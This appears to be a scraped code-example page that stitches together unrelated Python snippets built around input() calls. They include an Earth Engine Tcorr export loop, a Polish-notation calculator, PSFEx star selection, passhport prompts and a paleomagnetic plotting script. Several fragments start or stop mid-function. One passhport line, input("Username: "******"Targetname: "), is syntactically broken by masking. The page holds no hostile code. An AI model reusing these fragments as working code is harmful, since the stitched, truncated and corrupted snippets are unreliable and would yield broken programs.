            # TODO: Make sure output from bounds is in WGS84
            study_area_extent = tmax_mask.geometry().bounds().getInfo()
        logging.debug(f'\nStudy area extent not set in INI, '
                      f'default to {study_area_extent}')
    study_area_geom = ee.Geometry.Rectangle(study_area_extent,
                                            proj='EPSG:4326',
                                            geodesic=False)

    # For now define the study area from an extent
    if study_area_extent:
        study_area_geom = ee.Geometry.Rectangle(study_area_extent,
                                                proj='EPSG:4326',
                                                geodesic=False)
        export_geom = export_geom.intersection(study_area_geom, 1)
        # logging.debug('  Extent: {}'.format(export_geom.bounds().getInfo()))

    # If cell_size parameter is set in the INI,
    # adjust the output cellsize and recompute the transform and shape
    try:
        export_cs = float(ini['EXPORT']['cell_size'])
        export_shape = [
            int(math.ceil(abs((export_shape[0] * export_geo[0]) / export_cs))),
            int(math.ceil(abs((export_shape[1] * export_geo[4]) / export_cs)))
        ]
        export_geo = [
            export_cs, 0.0, export_geo[2], 0.0, -export_cs, export_geo[5]
        ]
        logging.debug('  Custom export cell size: {}'.format(export_cs))
        logging.debug('  Geo: {}'.format(export_geo))
        logging.debug('  Shape: {}'.format(export_shape))
    except KeyError:
        pass

    if not ee.data.getInfo(tcorr_scene_coll_id):
        logging.info('\nExport collection does not exist and will be built'
                     '\n  {}'.format(tcorr_scene_coll_id))
        input('Press ENTER to continue')
        ee.data.createAsset({'type': 'IMAGE_COLLECTION'}, tcorr_scene_coll_id)

    # Get current asset list
    logging.debug('\nGetting GEE asset list')
    asset_list = utils.get_ee_assets(tcorr_scene_coll_id)
    # if logging.getLogger().getEffectiveLevel() == logging.DEBUG:
    #     pprint.pprint(asset_list[:10])

    # Get current running tasks
    tasks = utils.get_ee_tasks()
    if logging.getLogger().getEffectiveLevel() == logging.DEBUG:
        logging.debug('  Tasks: {}\n'.format(len(tasks)))
        input('ENTER')

    # TODO: Decide if month and year lists should be applied to scene exports
    # # Limit by year and month
    # try:
    #     month_list = sorted(list(utils.parse_int_set(ini['TCORR']['months'])))
    # except:
    #     logging.info('\nTCORR "months" parameter not set in the INI,'
    #                  '\n  Defaulting to all months (1-12)\n')
    #     month_list = list(range(1, 13))
    # try:
    #     year_list = sorted(list(utils.parse_int_set(ini['TCORR']['years'])))
    # except:
    #     logging.info('\nTCORR "years" parameter not set in the INI,'
    #                  '\n  Defaulting to all available years\n')
    #     year_list = []

    if cron_flag:
        # CGM - This seems like a silly way of getting the date as a datetime
        #   Why am I doing this and not using the commented out line?
        end_dt = datetime.date.today().strftime('%Y-%m-%d')
        end_dt = datetime.datetime.strptime(end_dt, '%Y-%m-%d')
        end_dt = end_dt + datetime.timedelta(days=-4)
        # end_dt = datetime.datetime.today() + datetime.timedelta(days=-1)
        start_dt = end_dt + datetime.timedelta(days=-64)
    else:
        start_dt = datetime.datetime.strptime(ini['INPUTS']['start_date'],
                                              '%Y-%m-%d')
        end_dt = datetime.datetime.strptime(ini['INPUTS']['end_date'],
                                            '%Y-%m-%d')
    if end_dt >= datetime.datetime.today():
        logging.debug('End Date:   {} - setting end date to current '
                      'date'.format(end_dt.strftime('%Y-%m-%d')))
        end_dt = datetime.datetime.today()
    if start_dt < datetime.datetime(1984, 3, 23):
        logging.debug('Start Date: {} - no Landsat 5+ images before '
                      '1984-03-23'.format(start_dt.strftime('%Y-%m-%d')))
        start_dt = datetime.datetime(1984, 3, 23)
    start_date = start_dt.strftime('%Y-%m-%d')
    end_date = end_dt.strftime('%Y-%m-%d')
    # next_date = (start_dt + datetime.timedelta(days=1)).strftime('%Y-%m-%d')
    logging.debug('Start Date: {}'.format(start_date))
    logging.debug('End Date:   {}\n'.format(end_date))
    if start_dt > end_dt:
        raise ValueError('start date must be before end date')

    # Get the list of WRS2 tiles that intersect the data area and study area
    wrs2_coll = ee.FeatureCollection(wrs2_coll_id) \
        .filterBounds(export_geom) \
        .filterBounds(study_area_geom)
    if wrs2_tiles:
        wrs2_coll = wrs2_coll.filter(
            ee.Filter.inList(wrs2_tile_field, wrs2_tiles))
    wrs2_info = wrs2_coll.getInfo()['features']
    # pprint.pprint(wrs2_info)
    # input('ENTER')

    # Iterate over WRS2 tiles (default is from west to east)
    for wrs2_ftr in sorted(wrs2_info,
                           key=lambda k: k['properties']['WRS2_TILE'],
                           reverse=not (reverse_flag)):
        wrs2_tile = wrs2_ftr['properties'][wrs2_tile_field]
        logging.info('{}'.format(wrs2_tile))

        wrs2_path = int(wrs2_tile[1:4])
        wrs2_row = int(wrs2_tile[5:8])
        # wrs2_path = wrs2_ftr['properties']['PATH']
        # wrs2_row = wrs2_ftr['properties']['ROW']

        wrs2_filter = [{
            'type': 'equals',
            'leftField': 'WRS_PATH',
            'rightValue': wrs2_path
        }, {
            'type': 'equals',
            'leftField': 'WRS_ROW',
            'rightValue': wrs2_row
        }]
        filter_args = {c: wrs2_filter for c in collections}

        # Build and merge the Landsat collections
        model_obj = ssebop.Collection(
            collections=collections,
            start_date=start_date,
            end_date=end_date,
            cloud_cover_max=cloud_cover,
            geometry=ee.Geometry(wrs2_ftr['geometry']),
            model_args=model_args,
            filter_args=filter_args,
        )
        landsat_coll = model_obj.overpass(variables=['ndvi'])
        # pprint.pprint(landsat_coll.aggregate_array('system:id').getInfo())
        # input('ENTER')

        try:
            image_id_list = landsat_coll.aggregate_array('system:id').getInfo()
        except Exception as e:
            logging.warning('  Error getting image ID list, skipping tile')
            logging.debug(f'  {e}')
            continue

        if update_flag:
            assets_info = utils.get_info(
                ee.ImageCollection(tcorr_scene_coll_id).filterMetadata(
                    'wrs2_tile', 'equals',
                    wrs2_tile).filterDate(start_date, end_date))
            asset_props = {
                f'{tcorr_scene_coll_id}/{x["properties"]["system:index"]}':
                x['properties']
                for x in assets_info['features']
            }
        else:
            asset_props = {}

        # Sort by date
        for image_id in sorted(image_id_list,
                               key=lambda k: k.split('/')[-1].split('_')[-1],
                               reverse=reverse_flag):
            coll_id, scene_id = image_id.rsplit('/', 1)
            logging.info(f'{scene_id}')

            export_dt = datetime.datetime.strptime(
                scene_id.split('_')[-1], '%Y%m%d')
            export_date = export_dt.strftime('%Y-%m-%d')
            # next_date = (export_dt + datetime.timedelta(days=1)).strftime('%Y-%m-%d')

            # # Uncomment to apply month and year list filtering
            # if month_list and export_dt.month not in month_list:
            #     logging.debug(f'  Date: {export_date} - month not in INI - skipping')
            #     continue
            # elif year_list and export_dt.year not in year_list:
            #     logging.debug(f'  Date: {export_date} - year not in INI - skipping')
            #     continue

            logging.debug(f'  Date: {export_date}')

            export_id = export_id_fmt.format(product=tmax_name.lower(),
                                             scene_id=scene_id)
            logging.debug(f'  Export ID: {export_id}')

            asset_id = asset_id_fmt.format(coll_id=tcorr_scene_coll_id,
                                           scene_id=scene_id)
            logging.debug(f'  Asset ID: {asset_id}')

            if update_flag:

                def version_number(version_str):
                    return list(map(int, version_str.split('.')))

                if export_id in tasks.keys():
                    logging.info('  Task already submitted, skipping')
                    continue
                # In update mode only overwrite if the version is old
                if asset_props and asset_id in asset_props.keys():
                    model_ver = version_number(ssebop.__version__)
                    asset_ver = version_number(
                        asset_props[asset_id]['model_version'])

                    if asset_ver < model_ver:
                        logging.info('  Asset model version is old, removing')
                        try:
                            ee.data.deleteAsset(asset_id)
                        except:
                            logging.info('  Error removing asset, skipping')
                            continue
                    else:
                        logging.info('  Asset is up to date, skipping')
                        continue
            elif overwrite_flag:
                if export_id in tasks.keys():
                    logging.debug('  Task already submitted, cancelling')
                    ee.data.cancelTask(tasks[export_id]['id'])
                # This is intentionally not an "elif" so that a task can be
                # cancelled and an existing image/file/asset can be removed
                if asset_id in asset_list:
                    logging.debug('  Asset already exists, removing')
                    ee.data.deleteAsset(asset_id)
            else:
                if export_id in tasks.keys():
                    logging.debug('  Task already submitted, exiting')
                    continue
                elif asset_id in asset_list:
                    logging.debug('  Asset already exists, skipping')
                    continue

            image = ee.Image(image_id)
            # TODO: Will need to be changed for SR or use from_image_id()
            t_obj = ssebop.Image.from_landsat_c1_toa(image_id, **model_args)
            t_stats = ee.Dictionary(t_obj.tcorr_stats) \
                .combine({'tcorr_p5': 0, 'tcorr_count': 0}, overwrite=False)
            tcorr = ee.Number(t_stats.get('tcorr_p5'))
            count = ee.Number(t_stats.get('tcorr_count'))
            index = ee.Algorithms.If(count.gte(min_pixel_count), 0, 9)

            # Write an empty image if the pixel count is too low
            tcorr_img = ee.Algorithms.If(count.gte(min_pixel_count),
                                         tmax_mask.add(tcorr),
                                         tmax_mask.updateMask(0))

            # Clip to the Landsat image footprint
            output_img = ee.Image(tcorr_img).clip(image.geometry())

            # Clear the transparency mask
            output_img = output_img.updateMask(output_img.unmask(0)) \
                .rename(['tcorr']) \
                .set({
                    'CLOUD_COVER': image.get('CLOUD_COVER'),
                    'CLOUD_COVER_LAND': image.get('CLOUD_COVER_LAND'),
                    # 'SPACECRAFT_ID': image.get('SPACECRAFT_ID'),
                    'coll_id': coll_id,
                    'date_ingested': datetime.datetime.today().strftime('%Y-%m-%d'),
                    'date': export_dt.strftime('%Y-%m-%d'),
                    'doy': int(export_dt.strftime('%j')),
                    'image_id': image_id,
                    'model_name': model_name,
                    'model_version': ssebop.__version__,
                    'month': int(export_dt.month),
                    'scene_id': scene_id,
                    'system:time_start': image.get('system:time_start'),
                    'tcorr_value': tcorr,
                    'tcorr_index': index,
                    'tcorr_pixel_count': count,
                    'tmax_source': tmax_source.upper(),
                    'tmax_version': tmax_version.upper(),
                    'wrs2_path': wrs2_path,
                    'wrs2_row': wrs2_row,
                    'wrs2_tile': wrs2_tile,
                    'year': int(export_dt.year),
                })
            # pprint.pprint(output_img.getInfo()['properties'])
            # input('ENTER')

            logging.debug('  Building export task')
            task = ee.batch.Export.image.toAsset(
                image=output_img,
                description=export_id,
                assetId=asset_id,
                crs=export_crs,
                crsTransform='[' + ','.join(list(map(str, export_geo))) + ']',
                dimensions='{0}x{1}'.format(*export_shape),
            )

            logging.info('  Starting export task')
            utils.ee_task_start(task)

        # Pause before starting the next date (not export task)
        utils.delay_task(delay_time, max_ready)
        logging.debug('')
示例#52
0
    elif (oprt == 2): #multiplication
        return val1 * val2
    elif (oprt == 3): #divide
        return val1 / val2
    else :
        print("value not operator..")
        return -1
#-------------------------MAIN CODE---------------------------------------------------
Lifo = []                                                                       #Operator Stack
Fifo = []                                                                       #Operator Queue
generalList = []                                                                #seperated polish notasyon
operandList = []                                                                #operands will be processed
lastOperand =''                                                                 #last operator
result=-1

notasyon = input("Enter Polish Notation :")                                     # get notasyon
generalList = notasyon.split(" ")                                               #split notasyon

isFine = False                                                                  #is it ok ?
lastOperand=""

for i in generalList :
    if(isOperator(i)):                                                          #is operator
        isFine=True
        lastOperand=i
        Lifo.append(i)
    elif(isOperator(i)==False):
        operandList.append(int(i))
        if(len(operandList)==2 ):
            if(isFine):
                result = doIt(Lifo[len(Lifo)-1],operandList[0],operandList[1])
示例#53
0
    # Store the information
    configuration_1.store_mpc_data()

    # Set initial condition constraint for the next iteration
    configuration_1.prepare_next_iter()
    """
    ------------------------------------------------------
    do-mpc: Plot MPC animation if chosen by the user
    ------------------------------------------------------
    """
    # Plot animation if chosen in by the user
    #data_do_mpc.plot_animation(configuration_1)
    count=count+1
    print "dist:", dist(configuration_1.simulator.xf_sim, Y_ref)
    if dist(configuration_1.simulator.xf_sim, Y_ref)<=5:
        break

"""
------------------------------------------------------
do-mpc: Plot the closed-loop results
------------------------------------------------------
"""
plt.show()
#data_do_mpc.plot_mpc(configuration_1)

# Export to matlab if wanted
#data_do_mpc.export_to_matlab(configuration_1)
print "count: ", count

input("Press Enter to exit do-mpc...")
示例#54
0
def select_candidates(set,
                      prefs,
                      frmin,
                      frmax,
                      flags,
                      flux,
                      fluxerr,
                      rmsSize,
                      elong,
                      vignet,
                      plot=dict(),
                      title=""):
    maxbad = prefs.getBadpixNmax()
    maxbadflag = prefs.getBadpixFlag()
    maxelong = (prefs.getMaxellip() + 1.0) / (
        1.0 - prefs.getMaxellip()) if prefs.getMaxellip() < 1.0 else 100.0
    minsn = prefs.getMinsn()

    sn = flux / np.where(fluxerr > 0, fluxerr, 1)
    sn[fluxerr <= 0] = -psfexLib.BIG
    #---- Apply some selection over flags, fluxes...
    plotFlags = plot.get("showFlags") if plt else False
    plotRejection = plot.get("showRejection") if plt else False

    bad = flags & prefs.getFlagMask() != 0
    set.setBadFlags(int(sum(bad != 0)))

    if plotRejection:
        selectionVectors = []
        selectionVectors.append((bad, "flags %d" % sum(bad != 0)))

    dbad = sn < minsn
    set.setBadSN(int(sum(dbad)))
    bad = np.logical_or(bad, dbad)
    if plotRejection:
        selectionVectors.append((dbad, "S/N %d" % sum(dbad)))

    dbad = rmsSize < frmin
    set.setBadFrmin(int(sum(dbad)))
    bad = np.logical_or(bad, dbad)
    if plotRejection:
        selectionVectors.append((dbad, "frmin %d" % sum(dbad)))

    dbad = rmsSize > frmax
    set.setBadFrmax(int(sum(dbad)))
    bad = np.logical_or(bad, dbad)
    if plotRejection:
        selectionVectors.append((dbad, "frmax %d" % sum(dbad)))

    dbad = elong > maxelong
    set.setBadElong(int(sum(dbad)))
    bad = np.logical_or(bad, dbad)
    if plotRejection:
        selectionVectors.append((dbad, "elong %d" % sum(dbad)))

    #-- ... and check the integrity of the sample
    if maxbadflag:
        nbad = np.array([(v <= -psfexLib.BIG).sum() for v in vignet])
        dbad = nbad > maxbad
        set.setBadPix(int(sum(dbad)))
        bad = np.logical_or(bad, dbad)
        if plotRejection:
            selectionVectors.append((dbad, "badpix %d" % sum(dbad)))

    good = np.logical_not(bad)
    if plotFlags or plotRejection:
        imag = -2.5 * np.log10(flux)
        plt.clf()

        alpha = 0.5
        if plotFlags:
            labels = getFlags()

            isSet = np.where(flags == 0x0)[0]
            plt.plot(imag[isSet],
                     rmsSize[isSet],
                     'o',
                     alpha=alpha,
                     label="good")

            for i in range(16):
                mask = 1 << i
                if mask & prefs.getFlagMask():
                    isSet = np.where(np.bitwise_and(flags, mask))[0]
                    if isSet.any():
                        plt.plot(imag[isSet],
                                 rmsSize[isSet],
                                 'o',
                                 alpha=alpha,
                                 label=labels[mask])
        else:
            for bad, label in selectionVectors:
                plt.plot(imag[bad],
                         rmsSize[bad],
                         'o',
                         alpha=alpha,
                         label=label)

        plt.plot(imag[good],
                 rmsSize[good],
                 'o',
                 color="black",
                 label="selected")
        [plt.axhline(_, color='red') for _ in [frmin, frmax]]
        plt.xlim(np.median(imag[good]) + 5 * np.array([-1, 1]))
        plt.ylim(-0.1, 2 * frmax)
        plt.legend(loc=2)
        plt.xlabel("Instrumental Magnitude")
        plt.ylabel("rmsSize")
        plt.title("%s %d selected" % (title, sum(good)))

        input("Continue? ")

    return good
示例#55
0
文件: target.py 项目: phlb/passhport
def prompt_rmusergroup():
    """Prompt user to obtain data to remove a usergroup"""
    usergroupname = input("Usergroupname: ")
    targetname = input("Targetname: ")

    return {"<usergroupname>": usergroupname, "<targetname>": targetname}
示例#56
0
def main():
    global start
    parser = OptionParser()
    #parser.add_option("-f", "--file", dest="filename",
    #                  help="write report to FILE", metavar="FILE")
    parser.add_option("-O", "--output", dest="output", default = "none",
                          help="Set output TYPE: xml|hash", metavar="TYPE")
    parser.add_option("--start", dest="start", default = None,
                          help="Set start block", metavar="STMT")
    parser.add_option("-q", "--quiet",
                    action="store_false", dest="verbose", default=True,
                    help="don't print status messages to stdout")

    parser.add_option("--optdebug",
                    action="store_true", dest="optdebug", default=False,
                    help="debug optparse module")

    parser.add_option("--debug",
                    action="store_true", dest="debug", default=False,
                    help="prints lots of useless messages")


    (options, args) = parser.parse_args()
    if options.optdebug:
        print(options, args)
    if options.start:
        start = options.start
        print("Start setted to:" , start)




    def do_it():
        if options.output == "none": return
        tree_data = calctree(prog)
        if options.output == "hash":
            printtree(tree_data, mode = "hash")
        elif options.output == "xml":
            printtree(tree_data, mode = "xml")
        elif options.output == "file":
            f1_hash = open(filename+".hash","w")
            printtree(tree_data, mode = "hash", output = f1_hash)
            f1_hash.close()

            f1_xml = open(filename+".xml","w")
            printtree(tree_data, mode = "xml", output = f1_xml)
            f1_xml.close()
        elif options.output == "yaml":
            import yaml
            print(yaml.dump(tree_data['content']))

        else:
            print("Unknown outputmode", options.output)

    prog = "$$$"
    if len(args) > 0 :
        for filename in args:
            fs = filename.split("/")
            sys.stderr.write("Loading %s ..." % fs[-1])
            sys.stderr.flush()
            data = open(filename).read()
            sys.stderr.write(" parsing ...")
            sys.stderr.flush()
            prog = parse(data)
            sys.stderr.write(" formatting ...")
            sys.stderr.flush()
            if prog: do_it()
            sys.stderr.write(" Done.\n")
            sys.stderr.flush()

    else:


        line = ""
        while 1:
            try:
                line1 = input("flscript> ")
                if line1.startswith("#"):
                    comm = line1[1:].split(" ")
                    if comm[0] == "setstart":
                        start = comm[1]
                        print("Start setted to:" , start)
                    if comm[0] == "parse":
                        print()
                        prog = parse(line)
                        line = ""
                else:
                    line += line1
            except EOFError:
                break;
            line += "\n"
        print()
        prog = parse(line)
        do_it()
    """
示例#57
0
##viewer1 = Grid3DPyxViewer(var, zvalue = 1.0)
##viewer3 = Grid3DPyxViewer(var, zvalue = 3.0)
##viewer5 = Grid3DPyxViewer(var, zvalue = 5.0)
##viewer7 = Grid3DPyxViewer(var, zvalue = 7.0)
##viewer9 = Grid3DPyxViewer(var, zvalue = 9.0)

## viewer = Viewer(vars = var)

## viewer.plot()

var.constrain(valueSides, mesh.facesLeft)
var.constrain(valueSides, mesh.facesRight)
var.constrain(valueSides, mesh.facesTop)
var.constrain(valueSides, mesh.facesBottom)
var.constrain(valueFront, mesh.facesFront)
var.constrain(valueBack, mesh.facesBack)

## viewer.plot()

if __name__ == '__main__':
    ##viewer1.plot(resolution = 0.2, xlabel = "X values (Z value = 1)", minval = valueFront, maxval = valueBack)
    ##raw_input("press enter to continue")
    ##viewer3.plot(resolution = 0.2, xlabel = "X values (Z value = 3)", minval = valueFront, maxval = valueBack)
    ##raw_input("press enter to continue")
    ##viewer5.plot(resolution = 0.2, xlabel = "X values (Z value = 5)", minval = valueFront, maxval = valueBack)
    ##raw_input("press enter to continue")
    ##viewer7.plot(resolution = 0.2, xlabel = "X values (Z value = 7)", minval = valueFront, maxval = valueBack)
    ##raw_input("press enter to continue")
    ##viewer9.plot(resolution = 0.2, xlabel = "X values (Z value = 9)", minval = valueFront, maxval = valueBack)
    input("finished")
示例#58
0
文件: target.py 项目: phlb/passhport
def prompt_checkaccess():
    """Prompt a pattern to search targets and check access"""
    pattern = input("Pattern used to search the targets to test:")

    return {"<pattern>": pattern}
示例#59
0
def main():
    """
    NAME
        lowrie.py

    DESCRIPTION
       plots intensity decay curves for Lowrie experiments

    SYNTAX
        lowrie -h [command line options]

    INPUT
       takes SIO formatted input files

    OPTIONS
        -h prints help message and quits
        -f FILE: specify input file
        -N do not normalize by maximum magnetization
        -fmt [svg, pdf, eps, png] specify fmt, default is svg
        -sav save plots and quit
    """
    fmt, plot = 'svg', 0
    FIG = {}  # plot dictionary
    FIG['lowrie'] = 1  # demag is figure 1
    pmagplotlib.plot_init(FIG['lowrie'], 6, 6)
    norm = 1  # default is to normalize by maximum axis
    if len(sys.argv) > 1:
        if '-h' in sys.argv:
            print(main.__doc__)
            sys.exit()
        if '-N' in sys.argv:
            norm = 0  # don't normalize
        if '-sav' in sys.argv:
            plot = 1  # don't normalize
        if '-fmt' in sys.argv:  # sets input filename
            ind = sys.argv.index("-fmt")
            fmt = sys.argv[ind + 1]
        if '-f' in sys.argv:  # sets input filename
            ind = sys.argv.index("-f")
            in_file = sys.argv[ind + 1]
        else:
            print(main.__doc__)
            print('you must supply a file name')
            sys.exit()
    else:
        print(main.__doc__)
        print('you must supply a file name')
        sys.exit()
    data = pmag.open_file(in_file)
    PmagRecs = []  # set up a list for the results
    keys = ['specimen', 'treatment', 'csd', 'M', 'dec', 'inc']
    for line in data:
        PmagRec = {}
        rec = line.replace('\n', '').split()
        for k in range(len(keys)):
            PmagRec[keys[k]] = rec[k]
        PmagRecs.append(PmagRec)
    specs = pmag.get_dictkey(PmagRecs, 'specimen', '')
    sids = []
    for spec in specs:
        if spec not in sids:
            sids.append(spec)  # get list of unique specimen names
    for spc in sids:  # step through the specimen names
        pmagplotlib.plot_init(FIG['lowrie'], 6, 6)
        print(spc)
        specdata = pmag.get_dictitem(PmagRecs, 'specimen', spc,
                                     'T')  # get all this one's data
        DIMs, Temps = [], []
        for dat in specdata:  # step through the data
            DIMs.append(
                [float(dat['dec']),
                 float(dat['inc']),
                 float(dat['M']) * 1e-3])
            Temps.append(float(dat['treatment']))
        carts = pmag.dir2cart(DIMs).transpose()
        # if norm==1: # want to normalize
        #    nrm=max(max(abs(carts[0])),max(abs(carts[1])),max(abs(carts[2]))) # by maximum of x,y,z values
        #    ylab="M/M_max"
        if norm == 1:  # want to normalize
            nrm = (DIMs[0][2])  # normalize by NRM
            ylab = "M/M_o"
        else:
            nrm = 1.  # don't normalize
            ylab = "Magnetic moment (Am^2)"
        xlab = "Temperature (C)"
        pmagplotlib.plot_xy(FIG['lowrie'],
                            Temps,
                            old_div(abs(carts[0]), nrm),
                            sym='r-')
        pmagplotlib.plot_xy(FIG['lowrie'],
                            Temps,
                            old_div(abs(carts[0]), nrm),
                            sym='ro')  # X direction
        pmagplotlib.plot_xy(FIG['lowrie'],
                            Temps,
                            old_div(abs(carts[1]), nrm),
                            sym='c-')
        pmagplotlib.plot_xy(FIG['lowrie'],
                            Temps,
                            old_div(abs(carts[1]), nrm),
                            sym='cs')  # Y direction
        pmagplotlib.plot_xy(FIG['lowrie'],
                            Temps,
                            old_div(abs(carts[2]), nrm),
                            sym='k-')
        pmagplotlib.plot_xy(FIG['lowrie'],
                            Temps,
                            old_div(abs(carts[2]), nrm),
                            sym='k^',
                            title=spc,
                            xlab=xlab,
                            ylab=ylab)  # Z direction
        files = {'lowrie': 'lowrie:_' + spc + '_.' + fmt}
        if plot == 0:
            pmagplotlib.draw_figs(FIG)
            ans = input('S[a]ve figure? [q]uit, <return> to continue   ')
            if ans == 'a':
                pmagplotlib.save_plots(FIG, files)
            elif ans == 'q':
                sys.exit()
        else:
            pmagplotlib.save_plots(FIG, files)
        pmagplotlib.clearFIG(FIG['lowrie'])
示例#60
0
文件: target.py 项目: phlb/passhport
def prompt_adduser():
    """Prompt user to obtain data to add a user"""
    username = input("Username: "******"Targetname: ")

    return {"<username>": username, "<targetname>": targetname}